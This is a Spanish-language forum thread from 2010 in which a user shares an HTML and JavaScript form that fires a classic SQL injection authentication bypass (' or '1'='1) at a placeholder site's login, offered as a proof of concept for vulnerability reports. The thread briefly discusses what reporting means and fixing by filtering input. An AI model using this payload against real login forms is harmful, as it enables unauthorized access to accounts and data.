Reportar inyecciones SQL

Iniciado por SnakingMax, 5 Octubre 2010, 23:19 PM

0 Miembros y 1 Visitante están viendo este tema.

SnakingMax

Os dejo un código muy sencillo en html+javascript que he utilizado para reportar inyecciones sql. Sin tener conocimientos de informática a cualquiera que se le haga el reporte puede comprobar la vulnerabilidad.


Código (javascript) [Seleccionar]

<script language="javascript">

function enviar()
{
document.getElementById('valor1').value = "' or '1'='1"+document.getElementById('valor1').value;
return true;
}

</script>

Acceder al primer usuario cuyo LOGIN sea:

<form method="post" action="http://www.laweb.com/accion" onsubmit="enviar();">
<input name="login" id="valor1" type="text">
<input name="password" value="' or '1'='1" id="valor2" type="hidden">
<input value="Enviar" type="submit">

</form>

Shell Root

Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.


SnakingMax

Me había olvidado cambiar la inyección que tenía por ' or '1' = '1 y también desocultar un campo que tenía de tipo password. En la inyección en la que lo utilicé el campo password se modifica así que no se puede inyectar ahí.

Saludos

Shell Root

@SnakingMax, para vos que es reportar?
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.

SnakingMax

#5
Cita de: Shell Root en  5 Octubre 2010, 23:50 PM
@SnakingMax, para vos que es reportar?

Pues para mi reportar es informar de algo (dar un reporte), y en este caso el reporte es una prueba del concepto.
Y si quieres adjuntas también info sobre como se corrige la vulnerabilidad desde la BD o desde el propio código PHP filtrando los caracteres que no se desean.

También podría haber puesto como título del post lanzador de inyecciones sql, pero le veo mejor utilidad al código como reporte en un correo electrónico.

Si me equivoco corrígeme, estoy en el foro para aprender y para aportar en lo que pueda  :D